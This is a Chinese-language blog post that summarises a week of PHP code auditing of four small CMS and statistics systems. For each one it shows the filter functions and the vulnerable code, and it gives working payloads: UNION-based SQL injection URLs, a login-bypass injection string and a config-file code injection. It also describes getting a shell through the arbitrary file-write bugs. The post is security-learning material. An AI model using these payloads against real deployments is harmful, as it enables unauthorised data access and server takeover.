<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.4.2" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.4.2">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/noel.png?v=6.4.2">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/noel.png?v=6.4.2">


  <link rel="mask-icon" href="/images/logo.svg?v=6.4.2" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.4.2',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="看了一周的PHP了，算是做个总结">
<meta name="keywords" content="PHP">
<meta property="og:type" content="article">
<meta property="og:title" content="代码审计一周总结 11-3">
<meta property="og:url" content="http://yoursite.com/2018/11/03/代码审计一周总结-1/index.html">
<meta property="og:site_name" content="Noel&#39;s Blog">
<meta property="og:description" content="看了一周的PHP了，算是做个总结">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2018/11/03/代码审计一周总结-1/01.png">
<meta property="og:image" content="http://yoursite.com/2018/11/03/代码审计一周总结-1/代码审计一周总结-1//02.png">
<meta property="og:image" content="http://yoursite.com/2018/11/03/代码审计一周总结-1/代码审计一周总结-1//03.png">
<meta property="og:image" content="http://yoursite.com/2018/11/03/代码审计一周总结-1/代码审计一周总结-1//04.png">
<meta property="og:image" content="http://yoursite.com/2018/11/03/代码审计一周总结-1/代码审计一周总结-1//05.png">
<meta property="og:image" content="http://yoursite.com/2018/11/03/代码审计一周总结-1/代码审计一周总结-1//06.png">
<meta property="og:image" content="http://yoursite.com/2018/11/03/代码审计一周总结-1/代码审计一周总结-1//07.png">
<meta property="og:image" content="http://yoursite.com/2018/11/03/代码审计一周总结-1/08.png">
<meta property="og:updated_time" content="2018-11-04T01:20:49.568Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="代码审计一周总结 11-3">
<meta name="twitter:description" content="看了一周的PHP了，算是做个总结">
<meta name="twitter:image" content="http://yoursite.com/2018/11/03/代码审计一周总结-1/01.png">






  <link rel="canonical" href="http://yoursite.com/2018/11/03/代码审计一周总结-1/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>代码审计一周总结 11-3 | Noel's Blog</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Noel's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />分类</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />归档</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/11/03/代码审计一周总结-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Noel">
      <meta itemprop="description" content="I love u">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Noel's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">代码审计一周总结 11-3
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2018-11-03 00:00:00" itemprop="dateCreated datePublished" datetime="2018-11-03T00:00:00+08:00">2018-11-03</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2018-11-04 09:20:49" itemprop="dateModified" datetime="2018-11-04T09:20:49+08:00">2018-11-04</time>
              
            
          </span>

          

          
            
          

          
          

          

          
            <span class="post-meta-divider">|</span>
            <span id="busuanzi_value_page_pv"></span>次阅读
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>看了一周的PHP了，算是做个总结<br><a id="more"></a></p>
<h3 id="1-Tun2-免费版本"><a href="#1-Tun2-免费版本" class="headerlink" title="1. Tun2 免费版本"></a>1. Tun2 免费版本</h3><p>/inc/config_db.php里存在过滤函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">inject_check</span><span class="params">($sql_str)</span> </span>&#123;     </span><br><span class="line"><span class="keyword">return</span> eregi(<span class="string">'select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile'</span>, $sql_str);    <span class="comment">// 进行过滤     </span></span><br><span class="line">&#125;  </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">verify_id</span><span class="params">($id=null)</span> </span>&#123;</span><br><span class="line"><span class="keyword">if</span>($id)&#123;       </span><br><span class="line"><span class="keyword">if</span> (inject_check($id)) &#123; <span class="keyword">exit</span>(<span class="string">'提交的参数非法！'</span>); &#125;    <span class="comment">// 注射判断     </span></span><br><span class="line"><span class="keyword">elseif</span> (!is_numeric($id)) &#123; <span class="keyword">exit</span>(<span class="string">'提交的参数非法！'</span>); &#125;    <span class="comment">// 数字判断     </span></span><br><span class="line">$id = intval($id);    <span class="comment">// 整型化</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> $id; </span><br><span class="line">&#125;     </span><br><span class="line">       </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">str_check</span><span class="params">( $str )</span> </span>&#123;     </span><br><span class="line"><span class="keyword">if</span> (!get_magic_quotes_gpc()) &#123;    <span class="comment">// 判断magic_quotes_gpc是否打开     </span></span><br><span class="line">    $str = addslashes($str);    <span class="comment">// 进行过滤     </span></span><br><span class="line">&#125;     </span><br><span class="line">$str = str_replace(<span class="string">"_"</span>, <span class="string">"\_"</span>, $str);    <span class="comment">// 把 '_'过滤掉     </span></span><br><span class="line">$str = str_replace(<span class="string">"%"</span>, <span class="string">"\%"</span>, $str);    <span class="comment">// 把 '%'过滤掉     </span></span><br><span class="line">    </span><br><span class="line"><span class="keyword">return</span> $str;      </span><br><span class="line">&#125;     </span><br><span class="line">   </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">post_check</span><span class="params">($post)</span> </span>&#123;     </span><br><span class="line"><span class="keyword">if</span> (!get_magic_quotes_gpc()) &#123;    <span class="comment">// 判断magic_quotes_gpc是否为打开     </span></span><br><span class="line">    $post = addslashes($post);    <span class="comment">// 进行magic_quotes_gpc没有打开的情况对提交数据的过滤     </span></span><br><span class="line">&#125;     </span><br><span class="line">$post = str_replace(<span class="string">"_"</span>, <span class="string">"\_"</span>, $post);    <span class="comment">// 把 '_'过滤掉     </span></span><br><span class="line">$post = str_replace(<span class="string">"%"</span>, <span class="string">"\%"</span>, $post);    <span class="comment">// 把 '%'过滤掉     </span></span><br><span class="line">$post = nl2br($post);    <span class="comment">// 回车转换     </span></span><br><span class="line">$post = htmlspecialchars($post);    <span class="comment">// html标记转换   //stripcslashes  </span></span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> $post;     </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">uh</span> <span class="params">( $str )</span> </span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">$farr = <span class="keyword">array</span>( </span><br><span class="line"><span class="string">"/\s+/"</span> , <span class="comment">//过滤多余的空白 </span></span><br><span class="line"><span class="string">"/&lt;(\/?)(script|META|STYLE|HTML|HEAD|BODY|STYLE |i?frame|b|strong|style|html|img|P|o:p|iframe|u|em|strike|BR|div|a|TABLE|TBODY|object|tr|td|st1:chsdate|FONT|span|MARQUEE|body|title|\r\n|link|meta|\?|\%)([^&gt;]*?)&gt;/isU"</span> , <span class="comment">//过滤 &lt;script 防止引入恶意内容或恶意代码,如果不需要插入flash等,还可以加入&lt;object的过滤 </span></span><br><span class="line"><span class="string">"/(&lt;[^&gt;]*)on[a-zA-Z]+\s*=([^&gt;]*&gt;)/isU"</span> , <span class="comment">//过滤javascript的on事件 </span></span><br><span class="line">); </span><br><span class="line">$tarr = <span class="keyword">array</span>( </span><br><span class="line"><span class="string">" "</span> , </span><br><span class="line"><span class="string">""</span> , <span class="comment">//如果要直接清除不安全的标签，这里可以留空 </span></span><br><span class="line"><span class="string">"\\1\\2"</span> , </span><br><span class="line">); </span><br><span class="line">$str = preg_replace ( $farr , $tarr , $str ); </span><br><span class="line">$str2 = str_replace (<span class="string">'&lt;'</span>,<span class="string">'&amp;lt;'</span> , $str ); </span><br><span class="line">$str3 = str_replace (<span class="string">'&gt;'</span>,<span class="string">'&amp;gt;'</span> , $str2 ); </span><br><span class="line"><span class="keyword">return</span> $str3 ; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>正则匹配搜索一下<code>\$_POST|\$_GET|\$_REQUESR</code></p>
<p>除了后台界面有些没过滤，前台参数在传递时基本被过滤了，仅有的几个没被过滤的也没有利用价值</p>
<p>Admin_Notice.php</p>
<p>后台注入中随意举个栗子</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">......</span><br><span class="line">......</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">edit</span><span class="params">( )</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $db,$DB_dbprefix;</span><br><span class="line">	$db-&gt;query( <span class="string">"select * from &#123;$DB_dbprefix&#125;notice WHERE id="</span>.$_GET[<span class="string">'id'</span>] );</span><br><span class="line">......</span><br><span class="line">......</span><br></pre></td></tr></table></figure>
<h4 id="1-注入"><a href="#1-注入" class="headerlink" title="1.注入"></a>1.注入</h4><p>id不需要闭合单引号，可直接进行注入</p>
<p>构造payload</p>
<p><code>http://localhost:8080/Tun2/Admin/Admin_Notice.php?Action=edit&amp;id=1 union select 1,database(),user(),1 limit 1,1</code></p>
<p><img src="/2018/11/03/代码审计一周总结-1/01.png" alt=""></p>
<h4 id="2-直接数据库查询"><a href="#2-直接数据库查询" class="headerlink" title="2.直接数据库查询"></a>2.直接数据库查询</h4><p>后台存在数据库管理</p>
<p><img src="代码审计一周总结-1//02.png" alt=""></p>
<p>可以直接进行查询</p>
<h4 id="3-任意文件读写GETSHELL"><a href="#3-任意文件读写GETSHELL" class="headerlink" title="3.任意文件读写GETSHELL"></a>3.任意文件读写GETSHELL</h4><p>Admin_Templates.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="string">"edit"</span> :</span><br><span class="line">				<span class="keyword">if</span> ( !( $fp = fopen( $_GET[<span class="string">'editfile'</span>], <span class="string">"rb"</span> ) ) )</span><br><span class="line">				&#123;</span><br><span class="line">								<span class="keyword">exit</span>( <span class="string">"不能打开文件"</span>.$_GET[<span class="string">'editfile'</span>] );</span><br><span class="line">				&#125;</span><br><span class="line">				$data = fread( $fp, filesize( $_GET[<span class="string">'editfile'</span>] ) );</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">"&lt;script language=\"javascript\" src=\"inc/js.js\"&gt;&lt;/script&gt;\r\n&lt;table width=\"98%\" border=\"1\" align=\"center\" cellpadding=\"5\" cellspacing=\"0\" class=\"table\"&gt;\r\n  &lt;form action=\"Admin_Templates.php?Action=editsever\" method=\"post\" onSubmit=\"return Validator.Validate(this,3)\"&gt;\r\n    &lt;tr&gt;\r\n      &lt;td width=\"15%\" align=\"right\"&gt;文件名称：&lt;/td&gt;\r\n      &lt;td&gt;&lt;input name=\"filename\" type=\"text\" value=\""</span>;</span><br><span class="line">				<span class="keyword">echo</span> $_GET[<span class="string">'file'</span>];</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">"\" size=\"40\" readonly&gt;&lt;/td&gt;\r\n    &lt;/tr&gt;\r\n    &lt;tr&gt;\r\n      &lt;td colspan=\"2\" align=\"right\"&gt;&lt;textarea name=\"htmlcontent\" style=\"width:100%\" rows=\"30\" dataType=\"Require\" msg=\"请填写模版内容\"&gt;"</span>;</span><br><span class="line">				<span class="keyword">echo</span> str_replace(<span class="string">"textarea&gt;"</span>, <span class="string">"textarea＞"</span>, $data);</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">"&lt;/textarea&gt;&lt;/td&gt;\r\n    &lt;/tr&gt;\r\n    &lt;tr&gt;\r\n      &lt;td colspan=\"2\" align=\"center\"&gt;&lt;input name=\"file\" type=\"hidden\" value=\""</span>;</span><br><span class="line">				<span class="keyword">echo</span> $_GET[<span class="string">'editfile'</span>];</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">"\"&gt;&lt;input type=\"submit\" name=\"Submit_add\" value=\"修改模板\" /&gt;&lt;/td&gt;\r\n    &lt;/tr&gt;\r\n  &lt;/form&gt;\r\n&lt;/table&gt;\r\n\t"</span>;</span><br><span class="line">				fclose( $fp );</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">			<span class="keyword">case</span> <span class="string">"editsever"</span> :</span><br><span class="line">				wfile( $_POST[<span class="string">'file'</span>], stripcslashes( str_replace(<span class="string">"textarea＞"</span>, <span class="string">"textarea&gt;"</span>, $_POST[<span class="string">'htmlcontent'</span>]) ) );</span><br><span class="line">				addlog( <span class="string">"修改模板"</span>.$_POST[<span class="string">'filename'</span>], $_SESSION[<span class="string">'user_name'</span>] );</span><br><span class="line">				admin_showerr( <span class="string">"&lt;li&gt;模板修改成功&lt;/li&gt;"</span>, <span class="string">"Admin_Templates.php"</span>, <span class="number">1</span> );</span><br><span class="line">				<span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>
<p>以上两个都可以GETSHELL，这里用editsever进行举例</p>
<p>构造payload</p>
<p><img src="代码审计一周总结-1//03.png" alt="">访问shell.php</p>
<p><img src="代码审计一周总结-1//04.png" alt=""></p>
<h3 id="2-乘风多用户PHP统计系统-v5-2"><a href="#2-乘风多用户PHP统计系统-v5-2" class="headerlink" title="2.乘风多用户PHP统计系统 v5.2"></a>2.乘风多用户PHP统计系统 v5.2</h3><p>首先看下过滤函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">chkstr</span><span class="params">($paravalue,$paratype)</span> //过滤非法字符</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> <span class="keyword">if</span>($paratype==<span class="number">1</span>)</span><br><span class="line"> &#123;</span><br><span class="line">  $filterstr=<span class="string">"(and|or)\\b.+?(&gt;|&lt;|=|in|like)|\\/\\*.+?\\*\\/|&lt;\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)"</span>;</span><br><span class="line">  <span class="keyword">if</span> (preg_match(<span class="string">"/"</span>.$filterstr.<span class="string">"/is"</span>,$paravalue)==<span class="number">1</span>)&#123;   </span><br><span class="line">   <span class="keyword">echo</span> <span class="string">"传递的参数类型有错误！"</span>;</span><br><span class="line">   <span class="keyword">exit</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  $inputstr=str_replace(<span class="string">"'"</span>,<span class="string">"''"</span>,$paravalue);</span><br><span class="line">  &#125;</span><br><span class="line"> <span class="keyword">elseif</span>($paratype==<span class="number">2</span>)</span><br><span class="line"> &#123;</span><br><span class="line">   <span class="keyword">if</span>($paravalue!=<span class="string">""</span>&amp;&amp;is_numeric($paravalue)==<span class="keyword">false</span>)</span><br><span class="line">   &#123;</span><br><span class="line">     <span class="keyword">echo</span> <span class="string">"传递的参数类型有错误！"</span>;</span><br><span class="line">     <span class="keyword">exit</span>;</span><br><span class="line">	&#125;</span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">   &#123; </span><br><span class="line">    $inputstr=$paravalue;</span><br><span class="line">    &#125;</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="keyword">elseif</span>($paratype==<span class="number">3</span>)</span><br><span class="line"> &#123;</span><br><span class="line">   <span class="keyword">if</span>($paravalue!=<span class="string">""</span>&amp;&amp;(strtotime($paravalue)==<span class="keyword">false</span>||strtotime($paravalue)==<span class="number">-1</span>))</span><br><span class="line">   &#123;</span><br><span class="line">     <span class="keyword">echo</span>(<span class="string">"传递的参数类型有错误！"</span>);</span><br><span class="line">     <span class="keyword">exit</span>;</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">   &#123; </span><br><span class="line">    $inputstr=$paravalue;</span><br><span class="line">    &#125;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> $inputstr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>显然，很难绕过，所以先找下没被过滤的参数</p>
<h4 id="1-后台SQL注入"><a href="#1-后台SQL注入" class="headerlink" title="1.后台SQL注入"></a>1.后台SQL注入</h4><p>searchmodify.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>   </span><br><span class="line">$id=$_GET[<span class="string">"id"</span>];</span><br><span class="line"></span><br><span class="line">$sql=<span class="string">"select * from cfstat_search_set where id='$id'"</span>;</span><br><span class="line"><span class="keyword">echo</span> $sql;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$rs=mysql_fetch_assoc($result);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>payload</p>
<p><code>http://localhost/cfstat/adminuser.php?action=searchmodify&amp;id=1%27%20union%20select%201,2,3,user()%20limit%201,1%23</code></p>
<p><img src="代码审计一周总结-1//05.png" alt=""></p>
<p>此外还有一处是注册用户后可进行注册，发生在view.php就不在细说</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">$username=$_GET[<span class="string">"username"</span>];</span><br><span class="line">$sql=<span class="string">"select pagename,gbookstate from cfstat_user where username='$username'"</span>;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$rs=mysql_fetch_assoc($result);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h3 id="3-CWCMS-网站管理系统PHP版"><a href="#3-CWCMS-网站管理系统PHP版" class="headerlink" title="3.CWCMS 网站管理系统PHP版"></a>3.CWCMS 网站管理系统PHP版</h3><h4 id="1-全站SQL注入"><a href="#1-全站SQL注入" class="headerlink" title="1.全站SQL注入"></a>1.全站SQL注入</h4><p>未对传入参数进行任何处理，可以随意进行SQL注入</p>
<p>登录窗口构造payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user=<span class="string">' union select md5(1),md5(1),md5(1),md5(1)#&amp;pass=1&amp;yzm=32485&amp;act=login</span></span><br></pre></td></tr></table></figure>
<p>登陆成功</p>
<p><img src="代码审计一周总结-1//06.png" alt=""></p>
<h4 id="2-后台修改设置GETSHELL"><a href="#2-后台修改设置GETSHELL" class="headerlink" title="2.后台修改设置GETSHELL"></a>2.后台修改设置GETSHELL</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$html.=<span class="string">"&lt;?php"</span>.chr(<span class="number">10</span>);</span><br><span class="line">  $html.=chr(<span class="number">36</span>).<span class="string">"cw_name="</span>.chr(<span class="number">34</span>).$_POST[<span class="string">"cw_name"</span>].chr(<span class="number">34</span>).chr(<span class="number">59</span>).chr(<span class="number">10</span>);</span><br><span class="line">  $html.=chr(<span class="number">36</span>).<span class="string">"cw_host="</span>.chr(<span class="number">34</span>).$_POST[<span class="string">"cw_host"</span>].chr(<span class="number">34</span>).chr(<span class="number">59</span>).chr(<span class="number">10</span>);</span><br><span class="line">  $html.=chr(<span class="number">36</span>).<span class="string">"cw_root="</span>.chr(<span class="number">34</span>).$_POST[<span class="string">"cw_root"</span>].chr(<span class="number">34</span>).chr(<span class="number">59</span>).chr(<span class="number">10</span>);</span><br><span class="line">  $html.=chr(<span class="number">36</span>).<span class="string">"cw_upfile="</span>.chr(<span class="number">34</span>).$_POST[<span class="string">"cw_upfile"</span>].chr(<span class="number">34</span>).chr(<span class="number">59</span>).chr(<span class="number">10</span>);</span><br><span class="line">  $html.=chr(<span class="number">36</span>).<span class="string">"index_title="</span>.chr(<span class="number">34</span>).$_POST[<span class="string">"index_title"</span>].chr(<span class="number">34</span>).chr(<span class="number">59</span>).chr(<span class="number">10</span>);</span><br><span class="line">.......</span><br><span class="line">  cw_create(<span class="string">"../inc/"</span>,<span class="string">"config.php"</span>,$html);</span><br><span class="line">  <span class="keyword">echo</span>(<span class="string">"&lt;script&gt;alert('设置修改成功！');location.href='cw_web.php';&lt;/script&gt;"</span>);</span><br></pre></td></tr></table></figure>
<p>构造payload</p>
<p><code>cw_name=创文企业网站管理系统&quot;;phpinfo()//</code></p>
<p><img src="代码审计一周总结-1//07.png" alt=""></p>
<h3 id="4-夏日PHP电子商务系统V-02"><a href="#4-夏日PHP电子商务系统V-02" class="headerlink" title="4.夏日PHP电子商务系统V.02"></a>4.夏日PHP电子商务系统V.02</h3><h4 id="1-全站SQL注入-1"><a href="#1-全站SQL注入-1" class="headerlink" title="1.全站SQL注入"></a>1.全站SQL注入</h4><p>并未对输入做过滤，随意找一个注入点进行注入，就不进行分析了</p>
<p><img src="/2018/11/03/代码审计一周总结-1/08.png" alt=""></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>目前还是比较菜，大多数漏洞只能在后台界面发现，大多数漏洞原因是开发者在某个页面少了过滤。</p>
<p>待续</p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/PHP/" rel="tag"><i class="fa fa-tag"></i> PHP</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/10/28/monogodb-moadmin-php漏洞分析/" rel="next" title="monogodb moadmin.php漏洞分析">
                <i class="fa fa-chevron-left"></i> monogodb moadmin.php漏洞分析
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/12/27/Struts2命令执行小计/" rel="prev" title="Struts2命令执行">
                Struts2命令执行 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Noel</p>
              <p class="site-description motion-element" itemprop="description">I love u</p>
          </div>

          
